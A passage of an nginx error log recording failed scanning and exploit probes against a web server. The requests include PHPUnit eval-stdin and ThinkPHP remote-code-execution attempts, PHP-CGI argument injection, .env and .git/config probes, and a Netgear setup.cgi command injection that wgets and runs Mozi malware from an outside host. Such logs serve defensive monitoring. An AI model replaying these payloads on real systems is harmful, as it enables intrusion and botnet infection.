directory), client: 45.91.64.7, server: localhost-nginx-proxy-manager, request: "GET /aab9 HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 04:53:41 [error] 940#940: *93747 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 04:53:44 [error] 940#940: *93747 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 04:53:46 [error] 940#940: *93747 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 04:53:48 [error] 940#940: *93747 open() "/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 04:53:49 [error] 940#940: *93747 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 04:53:50 [error] 940#940: *93747 open() "/var/www/html/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 04:53:52 [error] 940#940: *93747 open() "/var/www/html/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 04:53:53 [error] 940#940: *93747 open() "/var/www/html/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 04:53:55 [error] 940#940: *93747 open() "/var/www/html/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 04:53:56 [error] 940#940: *93747 open() "/var/www/html/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 04:53:58 [error] 940#940: *93747 open() "/var/www/html/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 04:53:59 [error] 940#940: *93747 open() "/var/www/html/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 04:54:01 [error] 940#940: *93747 open() "/var/www/html/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 04:54:02 [error] 940#940: *93747 open() "/var/www/html/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 04:54:04 [error] 940#940: *93747 open() "/var/www/html/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 04:54:05 [error] 940#940: *93747 open() "/var/www/html/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 04:54:07 [error] 940#940: *93747 open() "/var/www/html/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 04:54:08 [error] 940#940: *93747 open() "/var/www/html/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 04:54:10 [error] 940#940: *93747 open() "/var/www/html/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 04:54:11 [error] 940#940: *93747 open() "/var/www/html/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 04:54:13 [error] 940#940: *93747 open() "/var/www/html/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 04:54:14 [error] 940#940: *93747 open() "/var/www/html/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 04:54:15 [error] 940#940: *93747 open() "/var/www/html/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 04:54:16 [error] 940#940: *93747 open() "/var/www/html/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 04:54:17 [error] 940#940: *93747 open() "/var/www/html/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 04:54:18 [error] 940#940: *93747 open() "/var/www/html/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 04:54:19 [error] 940#940: *93747 open() "/var/www/html/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 04:54:20 [error] 940#940: *93747 open() "/var/www/html/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 04:54:21 [error] 940#940: *93747 open() "/var/www/html/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 04:54:22 [error] 940#940: *93747 open() "/var/www/html/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 04:54:23 [error] 940#940: *93747 open() "/var/www/html/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 04:54:24 [error] 940#940: *93747 open() "/var/www/html/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 04:54:25 [error] 940#940: *93747 open() "/var/www/html/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 04:54:26 [error] 940#940: *93747 open() "/var/www/html/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 04:54:26 [error] 940#940: *93747 open() "/var/www/html/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 04:54:27 [error] 940#940: *93747 open() "/var/www/html/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 04:54:29 [error] 940#940: *93747 open() "/var/www/html/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 04:54:29 [error] 940#940: *93747 open() "/var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 04:54:30 [error] 940#940: *93747 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 04:54:31 [error] 940#940: *93747 open() "/var/www/html/public/index.php" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 04:54:34 [error] 940#940: *93747 open() "/var/www/html/containers/json" failed (2: No such file or directory), client: 177.70.2.220, server: localhost-nginx-proxy-manager, request: "GET /containers/json HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 05:36:24 [error] 941#941: *93757 open() "/var/www/html/login" failed (2: No such file or directory), client: 193.142.146.230, server: localhost-nginx-proxy-manager, request: "GET /login HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 05:49:02 [error] 943#943: *95249 open() "/var/www/html/login" failed (2: No such file or directory), client: 206.168.34.44, server: localhost-nginx-proxy-manager, request: "GET /login HTTP/1.1", host: "222.117.41.51" -2026/02/18 05:54:43 [error] 943#943: *95252 open() "/var/www/html/hello.world" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "POST /hello.world?%ADd+allow_url_include%3d1+%ADd+auto_prepend_file%3dphp://input HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 05:54:43 [error] 943#943: *95252 open() "/var/www/html/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 05:54:43 [error] 943#943: *95252 open() "/var/www/html/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 05:54:44 [error] 943#943: *95252 open() "/var/www/html/vendor/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 05:54:44 [error] 943#943: *95252 open() "/var/www/html/vendor/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 05:54:44 [error] 943#943: *95252 open() "/var/www/html/vendor/phpunit/phpunit/LICENSE/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /vendor/phpunit/phpunit/LICENSE/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 05:54:45 [error] 943#943: *95252 open() "/var/www/html/vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /vendor/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 05:54:45 [error] 943#943: *95252 open() "/var/www/html/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 05:54:45 [error] 943#943: *95252 open() "/var/www/html/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 05:54:46 [error] 943#943: *95252 open() "/var/www/html/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 05:54:46 [error] 943#943: *95252 open() "/var/www/html/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 05:54:46 [error] 943#943: *95252 open() "/var/www/html/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 05:54:47 [error] 943#943: *95252 open() "/var/www/html/lib/phpunit/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 05:54:47 [error] 943#943: *95252 open() "/var/www/html/lib/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 05:54:47 [error] 943#943: *95252 open() "/var/www/html/lib/phpunit/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /lib/phpunit/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 05:54:48 [error] 943#943: *95252 open() "/var/www/html/lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /lib/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 05:54:48 [error] 943#943: *95252 open() "/var/www/html/laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /laravel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 05:54:48 [error] 943#943: *95252 open() "/var/www/html/www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /www/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 05:54:48 [error] 943#943: *95252 open() "/var/www/html/ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /ws/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 05:54:49 [error] 943#943: *95252 open() "/var/www/html/yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /yii/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 05:54:49 [error] 943#943: *95252 open() "/var/www/html/zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /zend/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 05:54:49 [error] 943#943: *95252 open() "/var/www/html/ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /ws/ec/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 05:54:50 [error] 943#943: *95252 open() "/var/www/html/V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /V2/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 05:54:50 [error] 943#943: *95252 open() "/var/www/html/tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /tests/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 05:54:50 [error] 943#943: *95252 open() "/var/www/html/test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /test/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 05:54:50 [error] 943#943: *95252 open() "/var/www/html/testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /testing/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 05:54:51 [error] 943#943: *95252 open() "/var/www/html/api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /api/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 05:54:51 [error] 943#943: *95252 open() "/var/www/html/demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /demo/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 05:54:51 [error] 943#943: *95252 open() "/var/www/html/cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /cms/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 05:54:52 [error] 943#943: *95252 open() "/var/www/html/crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /crm/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 05:54:52 [error] 943#943: *95252 open() "/var/www/html/admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /admin/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 05:54:52 [error] 943#943: *95252 open() "/var/www/html/backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /backup/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 05:54:53 [error] 943#943: *95252 open() "/var/www/html/blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /blog/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 05:54:53 [error] 943#943: *95252 open() "/var/www/html/workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /workspace/drupal/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 05:54:54 [error] 943#943: *95252 open() "/var/www/html/panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /panel/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 05:54:54 [error] 943#943: *95252 open() "/var/www/html/public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /public/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 05:54:54 [error] 943#943: *95252 open() "/var/www/html/apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /apps/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 05:54:54 [error] 943#943: *95252 open() "/var/www/html/app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /app/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 05:54:55 [error] 943#943: *95252 open() "/var/www/html/index.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 05:54:55 [error] 943#943: *95252 open() "/var/www/html/public/index.php" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /public/index.php?s=/index/\think\app/invokefunction&function=call_user_func_array&vars[0]=md5&vars[1][]=Hello HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 05:54:56 [error] 943#943: *95252 open() "/var/www/html/containers/json" failed (2: No such file or directory), client: 159.65.119.52, server: localhost-nginx-proxy-manager, request: "GET /containers/json HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 05:57:48 [error] 951#951: *95258 open() "/var/www/html/.git/config" failed (2: No such file or directory), client: 172.94.9.253, server: localhost-nginx-proxy-manager, request: "GET /.git/config HTTP/1.1", host: "222.117.41.51" -2026/02/18 05:57:49 [error] 952#952: *95259 open() "/var/www/html/admin/.git/config" failed (2: No such file or directory), client: 172.94.9.253, server: localhost-nginx-proxy-manager, request: "GET /admin/.git/config HTTP/1.1", host: "222.117.41.51" -2026/02/18 05:57:49 [error] 950#950: *95260 open() "/var/www/html/private/.git/config" failed (2: No such file or directory), client: 172.94.9.253, server: localhost-nginx-proxy-manager, request: "GET /private/.git/config HTTP/1.1", host: "222.117.41.51" -2026/02/18 06:20:02 [error] 951#951: *95293 open() "/var/www/html/.env" failed (2: No such file or directory), client: 34.158.168.101, server: localhost-nginx-proxy-manager, request: "GET /.env HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 06:28:32 [error] 951#951: *95317 "/var/www/html/webui/index.html" is not found (2: No such file or directory), client: 74.82.47.2, server: localhost-nginx-proxy-manager, request: "GET /webui/ HTTP/1.1", host: "222.117.41.51" -2026/02/18 06:34:34 [error] 955#955: *96808 "/var/www/html/geoserver/web/index.html" is not found (2: No such file or directory), client: 74.82.47.2, server: localhost-nginx-proxy-manager, request: "GET /geoserver/web/ HTTP/1.1", host: "222.117.41.51" -2026/02/18 07:03:07 [error] 956#956: *96824 open() "/var/www/html/aaa9" failed (2: No such file or directory), client: 95.215.0.144, server: localhost-nginx-proxy-manager, request: "GET /aaa9 HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 07:03:08 [error] 956#956: *96826 open() "/var/www/html/aab9" failed (2: No such file or directory), client: 95.215.0.144, server: localhost-nginx-proxy-manager, request: "GET /aab9 HTTP/1.1", host: "222.117.41.51:80" -2026/02/18 08:03:00 [error] 951#951: *96943 open() "/var/www/html/setup.cgi" failed (2: No such file or directory), client: 182.60.237.31, server: localhost-nginx-proxy-manager, request: "GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=rm+-rf+/tmp/*;wget+http://182.60.237.31:42440/Mozi.m+-O+/tmp/netgear;sh+netgear&curpath=/¤tsetting.htm=1 HTTP/1.0" -2026/02/18 08:44:28 [error] 952#952: *96961 open() "/var/www/html/hello.world" failed 